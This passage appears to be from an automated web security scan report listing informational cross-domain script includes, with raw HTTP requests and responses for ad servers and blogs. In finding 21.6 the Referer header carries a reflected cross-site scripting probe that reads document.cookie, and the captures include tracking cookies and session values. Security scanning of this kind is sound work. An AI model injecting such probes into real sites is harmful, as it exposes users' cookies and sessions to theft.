Set-Cookie: adImpCount=IwBhXoqWG6cd6LK1Wnmfuw7xUeE2jEhl1LXLCYCWyYXfaqaDzVRu9ZiuBStYaftYsehsFTSmKxz8H_dT-Jl0Dn1PHcIwC2PH259DCE-JXiNlms1EyPDDRa9sja6UxkO0jlMiBdP63qEMyU4eHDk40-q8V4ePnDNpIWo0aHj1LgRvDJHsqYXKmn_CAlmwlDYlAXIue8YWt2dP1w1i6rIdu3iR9sNXakr5gajG_D0roJProc_DPPlbFfwQu1oDDSlmi2JCFUPKc93aEZ1NND-p1qQrupC4PpJl2uCWF8C-Ug7j4wRYKLFggqjCsn1_kL8pjIHdY1J8-8w9PDgWrAYzcfOyBFHryCDMlf-R2G5eCIyjNutLAx_ZaCjc4v3fNB7_VoYS3R2qKw_a47HiysS2Ptmba4Y5H-dc1Uw_QN8A08AWon01KMZJGdnyaU3IkYhpl8vSxIcisdU7_DI6syvRuno3ly0Kwty7GyhLwCaCPRFlbw3kCi5E8RA9R5HEL0TwQkKr1LG0nXzayhve6FCg1-K4j840hUH4soYbPmQ_AR75b5W85bNwz4KaV3P2D8M9TEr74XNNsqzNK-NlDoE2koee6NAFwZUQriKHjx4Pi8lyVtGdZhgjkOg4zjyNGYCDxGxSj2wWaOpITs_JSH4b4_PSRyaSmsOx3lW7T78waIcqXV7j_wp0-1vNUkgqZEX-1Z-OBBuFyn0OKy4G6pkFi7MhnWmekN1sUgWlK4cJ6ZwPl8PHmUPzlA3dCSM7To-CEXwS-6XX7wB6l1yuQyAyNQyqr-I1ILvQtxafsmYbSsGstISe8YznDbRH5otKYhQ1c7hoZnPzMNOkhNZZ-ZQhp0VuruacOi0fS2cp5uhOgCNvUBrICJHG0MnjQ0lTi6GGM302hU7_HqmpQOMIOs94uLT2ikIRW2HI5LDPiT9GU4wphmnhaS5Lbu_6A1w21YanVoYS3R2qKw_a47HiysS2PuMRKxsLZPg9TZ1tzqCyX1wWon01KMZJGdnyaU3IkYhpRRau1rpsTjOMSZYu72kBgFYls0L0hUa4kAoEYLAwYiaK2oyoHzJXoHiDmJnRkYVJTEk9R7kVTBwtrIAWFE2Lc-K4j840hUH4soYbPmQ_AR7zXj5Srs3uOya3rz3JO3P2znwP73OerR98IwLdJfM5ymCpFLJLMKLPcYf5SnIJJ1X6RI9r5uj4vnBp160Ud5xaxGxSj2wWaOpITs_JSH4b42dJUeQ2EvuZijWeQdTIJ3AGO1HG2Mx-sU7H8DziP0hpSscoJJn9hy1KmH4iwQNP7d_WsBU0E-UgFoJDSWMJtyDWIg74Kyudd-aKTtXOZIlNQPO5B3pOq1-XkD73HtsCaIoA8VHGZPaw8KVYCA0sJFaKAPFRxmT2sPClWAgNLCRWXOzXCBxLcPE6Ch7Z7LiZf2G_mSPqr9HXTX3upFEF7TiBXSv_NvKrn7LHnAqX43Rx-4z7rCEzxe9AJkUnSpSWL2FWvensquNi6iS6WJOp0rE; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: fc=_vlP_vna-iwaEgLjXffa4lB9LqX0spbsp94IIPTXQBdRvy6-tKeSzr3CZDTMcZ6x1q-zg9FMZDM2f224XLr3XKafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: pf=lvGeRa5W-f1SCZ0uXnD5CFrmDV3EiuOqs3FPczWBqpKJwV9kSIzX4BtZ7vBDkFqiOBRlShVAuVmwzPtTfRLP834lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:25:35 GMT
Content-Length: 9422


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
4429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;" WIDTH=468 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;">\n</SCRIPT>
...[SNIP]...

21.2. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;

Request

GET /server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14999%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 02:05:00 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 02:05:00 GMT
Content-Length: 9422


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
4429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;" WIDTH=468 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;">\n</SCRIPT>
...[SNIP]...

21.3. http://ads.tweetmeme.com/serve.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tweetmeme.com
Path:   /serve.js

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/zone/2671

Request

GET /serve.js?tag=home&width=300&height=250&rand=53705905654 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: ded2059
Content-Length: 9103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TweetMeme Advert
...[SNIP]...
<!-- advert: home_300x250 --><script type='text/javascript' src='http://static.fmpub.net/zone/2671'></script>
...[SNIP]...

21.4. http://ads.tweetmeme.com/serve.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tweetmeme.com
Path:   /serve.js

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/zone/2673

Request

GET /serve.js?tag=home&width=300&height=600&rand=26297691596 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h01
Content-Length: 9103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TweetMeme Advert
...[SNIP]...
<!-- advert: home_300x600 --><script type='text/javascript' src='http://static.fmpub.net/zone/2673'></script>
...[SNIP]...

21.5. http://ads.tweetmeme.com/serve.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tweetmeme.com
Path:   /serve.js

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /serve.js?tag=home_leaderboard_iframe&width=728&height=90&rand=99954773672 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:53 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h03
Content-Length: 9228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TweetMeme Advert
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.6. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The response dynamically includes the following script from another domain:
  • http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 02:19:47 GMT
Content-Length: 18077

<!DOCTYPE html>
<!-- Host: as2108 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js"></script>
...[SNIP]...

21.7. http://autotrader.dealix.com/step1.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autotrader.dealix.com
Path:   /step1.asp

Issue detail

The response dynamically includes the following script from another domain:
  • http://an.tacoda.net/an/12124/slf.js

Request

GET /step1.asp HTTP/1.1
Host: autotrader.dealix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 15:02:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12107
Content-Type: text/html
Set-Cookie: CkSE=1%2F24%2F2011+7%3A32%3A46+AM; path=/
Set-Cookie: CkSN=21028798455; path=/
Set-Cookie: CkUN=21028798455; expires=Thu, 21-Jan-2021 08:00:00 GMT; path=/
Cache-control: private


<!-- this is for Firefox Fix -->

<html>
   <head>
       
<title>Car Buying Service: New Car Buying Made Easy - Buy a car online at InvoiceDealers</title>
<meta name="description" content="InvoiceDe
...[SNIP]...
</SCRIPT><SCRIPT SRC="http://an.tacoda.net/an/12124/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

21.8. http://blog.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://widgets.twimg.com/j/2/widget.js
  • http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05

Request

GET / HTTP/1.1
Host: blog.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/about
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.2.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
Last-Modified: Mon, 24 Jan 2011 22:05:27 GMT
Accept-Ranges: bytes
Cache-Control: max-age=300, must-revalidate
Expires: Mon, 24 Jan 2011 22:26:24 GMT
Vary: Accept-Encoding,Cookie
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div id="flickr_badge_wrapper">
<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05"></script>
...[SNIP]...

21.9. http://blog.tweetmeme.com/wp-content/themes/tweetmeme-0.2/prototype.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.tweetmeme.com
Path:   /wp-content/themes/tweetmeme-0.2/prototype.js

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://widgets.twimg.com/j/2/widget.js
  • http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05

Request

GET /wp-content/themes/tweetmeme-0.2/prototype.js HTTP/1.1
Host: blog.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.2.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,Cookie
X-Pingback: http://blog.tweetmeme.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div id="flickr_badge_wrapper">
<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05"></script>
...[SNIP]...

21.10. http://blog.tweetmeme.com/wp-content/themes/tweetmeme-0.2/scriptaculous.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.tweetmeme.com
Path:   /wp-content/themes/tweetmeme-0.2/scriptaculous.js

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://widgets.twimg.com/j/2/widget.js
  • http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05

Request

GET /wp-content/themes/tweetmeme-0.2/scriptaculous.js HTTP/1.1
Host: blog.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.2.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,Cookie
X-Pingback: http://blog.tweetmeme.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div id="flickr_badge_wrapper">
<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05"></script>
...[SNIP]...

21.11. http://brandonaaron.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brandonaaron.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://i.simpli.fi/dpx.js?cid=107

Request

GET / HTTP/1.1
Host: brandonaaron.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:18 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.0.6
X-Runtime: 1ms
ETag: "94d9b02809d788830d3d2469636400ac"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _blog_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--43c046f6acf84405a38de8e12fc2c472b1d35a90; path=/; HttpOnly
Content-Length: 19341
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>Brandon Aaron : Blog</title>
<meta content='text/html; charset=utf-8' http-equiv='Content-type' />
<link href='/favicon.ico' rel='shortcut icon' />

...[SNIP]...
</script>
<script src='http://i.simpli.fi/dpx.js?cid=107' type='text/javascript'></script>
...[SNIP]...

